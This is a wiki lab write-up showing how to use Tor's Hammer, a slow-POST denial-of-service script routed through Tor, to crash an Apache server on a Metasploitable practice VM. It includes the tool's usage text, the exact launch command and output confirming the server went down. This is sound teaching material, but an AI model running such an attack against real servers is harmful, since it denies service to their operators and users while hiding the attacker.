Tors Hammer
From charlesreid1
Tor's Hammer is a Python script for creating denial of service attacks on websites. It is designed to be used through the Tor traffic anonymization tool.
Contents
Tor's Hammer Slow Body DoS Attack
Tor's Hammer (https://sourceforge.net/projects/torshammer/) is a tool that uses the slow body attack to swamp Apache servers and cause a denial of service DoS. It does this by sending a POST request with a large declared content-length (like 1000 MB), then performing the following, ad infinitum: send one letter through the open connection; take a nap.
Tor's Hammer, in particular, provides a Python script that enables running the slow body attack through a web proxy like Tor, to provide anonymity. It also implements other disguising elements like a slew of User Agent headers.
We'll test this tool out on the Metasploitable machine, which is running Apache 2.2.8, and see if it is vulnerable to the Tor's Hammer DoS attack. If so, we'll mount the attack.
NOTE: This will completely knock out the target server. The web server will run out of memory and will begin to drop packets from the device. It must be rebooted to fix. Use wisely.
Python Script
To run this attack, use the torshammer.py script from the link above.
$ python torshammer.py /* * Tor's Hammer * Slow POST DoS Testing Tool * Version 1.0 Beta * Anon-ymized via Tor */ ./torshammer.py -t <target> [-r <threads> -p <port> -T -h] -t|--target <Hostname|IP> -r|--threads <Number of threads> Defaults to 256 -p|--port <Web Server Port> Defaults to 80 -T|--tor Enable anonymising through tor on 127.0.0.1:9050 -h|--help Shows this help Eg. ./torshammer.py -t 192.168.1.100 -r 256
Run this against the IP address of the Metasploitable machine, 10.0.0.27:
# python torshammer.py -t 10.0.0.27
This will run with the default number of threads (256).
Results
This works like a charm, bringing the target 10.0.0.27 to its knees:
Bingo!
Note that there are a large number of errors printed,
error: [Errno 24] Too many open files Thread broken, restarting... Exception in thread Thread-1: Traceback (most recent call last): File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner File "torshammer.py", line 112, in run File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__ File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__ error: [Errno 24] Too many open files Thread broken, restarting... Exception in thread Thread-65: Traceback (most recent call last): File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner File "torshammer.py", line 112, in run File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__ File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__ error: [Errno 24] Too many open files Thread broken, restarting... Exception in thread Thread-17: Traceback (most recent call last): File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner File "torshammer.py", line 112, in run File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__ File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__
However, these don't seem to affect the attack, as the web server is inaccessible even while the error messages are being printed out.
Bringing Down The Server
Ping Down
At some point during the attack, the machine stopped responding to ping:
ping: sendto: Host is down Request timeout for icmp_seq 874 ping: sendto: Host is down Request timeout for icmp_seq 875 ping: sendto: Host is down Request timeout for icmp_seq 876 ping: sendto: Host is down Request timeout for icmp_seq 877 ping: sendto: Host is down Request timeout for icmp_seq 878 ping: sendto: Host is down Request timeout for icmp_seq 879 ping: sendto: Host is down Request timeout for icmp_seq 880 ping: sendto: Host is down Request timeout for icmp_seq 881 ping: sendto: Host is down Request timeout for icmp_seq 882 ping: sendto: Host is down Request timeout for icmp_seq 883 ping: sendto: Host is down Request timeout for icmp_seq 884 ping: sendto: Host is down Request timeout for icmp_seq 885 ping: sendto: Host is down Request timeout for icmp_seq 886 ping: sendto: Host is down Request timeout for icmp_seq 887 ping: sendto: Host is down Request timeout for icmp_seq 888 ping: sendto: Host is down Request timeout for icmp_seq 889 ping: sendto: Host is down Request timeout for icmp_seq 890 ping: sendto: Host is down Request timeout for icmp_seq 891 ping: sendto: Host is down Request timeout for icmp_seq 892 Request timeout for icmp_seq 893 Request timeout for icmp_seq 894 Request timeout for icmp_seq 895 Request timeout for icmp_seq 896 Request timeout for icmp_seq 897 Request timeout for icmp_seq 898 Request timeout for icmp_seq 899 Request timeout for icmp_seq 900 Request timeout for icmp_seq 901 Request timeout for icmp_seq 902 Request timeout for icmp_seq 903 Request timeout for icmp_seq 904 Request timeout for icmp_seq 905 Request timeout for icmp_seq 906 Request timeout for icmp_seq 907
Memory Squeeze
Turns out, the machine ran out of memory, and the network device began dropping packets:
This attack completely knocked the server offline, and it had to be rebooted.
pwn
To be sure: this attack can pwn a server.
Flags
DoS
 |
Denial of Service denial of service attacks for denying users access to resources that they are otherwise entitled to access.
DoS at Layers 1 and 2: CAM Table Overflow/MAC Flood: DoS/Mac Flood CAM Table Poisoning: DoS/Cam Poisoning
DoS at Layers 3 and 4: Syn Flood: DoS/SYN Flood Smurf Attack (Ping Flood): DoS/Smurf Attack DNS Attacks: DoS/DNS DNSSmurf Attack: DoS/DNSSmurf Wormhole Attack: DoS/Wormhole Attack Black Hole Attack: DoS/Black Hole Attack Byzantine Attack: DoS/Byzantine Attack Sleep Deprivation Attack: DoS/Sleep Deprivation Attack Stale Packets: DoS/Stale Packets
Toolz: Hping · Macof · Tcpnice · Hammer · Tors Hammer
Category:DoS · Category:Attacks · Category:Kali Attack Layers Flags · Template:DoSFlag · e |
Metasploitable
|
Metasploit any and all resources related to metasploit on this wiki
Category:Metasploit - pages labeled with the "Metasploit" category label MSF/Wordlists - wordlists that come bundled with Metasploit MSFVenom - msfvenom is used to craft payloads Meterpreter - the shell you'll have when you use MSF to craft a remote shell payload.
Category:Security · Category:Metasploit · Category:Kali
|
|
Metasploitable: The Red Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the RED TEAM's tools and routes of attack.
Exploiting MySQL with Metasploit: Metasploitable/MySQL Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres
Exploiting VSFTP Backdoor: Metasploitable/VSFTP SSH Penetration by Brute Force: Metasploitable/SSH/Brute Force SSH Penetration with Keys: Metasploitable/SSH/Keys SSH Penetration with Metasploit: Metasploitable/SSH/Exploits Brute-Forcing Exploiting NFS: Metasploitable/NFS Exploiting DNS Bind Server: Metasploitable/DNS Bind
Metasploitable Services: distcc: Metasploitable/distcc
Metasploitable Apache: Exploiting Apache (with Metasploit): Metasploitable/Apache Exploiting Apache (with Python): Metasploitable/Apache/Python Tor's Hammer DoS Attack: Metasploitable/TorsHammer * Apache DAV: Metasploitable/Apache/DAV * Apache Tomcat and Coyote: Metasploitable/Apache/Tomcat and Coyote
Metasploitable Memory: General approach to memory-based attacks: Metasploitable/Memory Investigating memory data: Metasploitable/Volatile Data Investigation Dumping Memory from Metasploit: Metasploitable/Dumping Memory
Metasploitable Fuzzing: (Have not done much work on fuzzing Metasploitable...)
Category:Security · Category:Metasploit · Category:Metasploitable · Category:Kali
|
|
Metasploitablue: The Blue Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the BLUE TEAM's methods for defending Metasploitable: defending against and responding to intrusions.
Hence the name, Metasploita-blue. Overview: Metasploitable/Defenses Metasploitable/Defenses/Stopping · Metasploitable/Defenses/Detecting
Metasploitable On-Machine Defenses: Linux Volatile Data System Investigation: Metasploitable/Volatile Data Investigation Linux Artifact Investigation: Metasploitable/Artifact Investigation Linux Iptables Essentials: Metasploitable/Iptables Firewall Assurance and Testing: Metasploitable/Firewall Password Assessment: Metasploitable/Password Assessment Standard Unix Ports: Unix/Ports
Netcat and Cryptcat (Blue Team): Metasploitable/Netcat and Metasploitable/Cryptcat Nmap (Blue Team): Metasploitable/Nmap Network Traffic Analysis: Metasploitable/Network Traffic Analysis Suspicious Traffic Patterns: Metasploitable/Suspicious Traffic Patterns Snort IDS: Metasploitable/Snort
|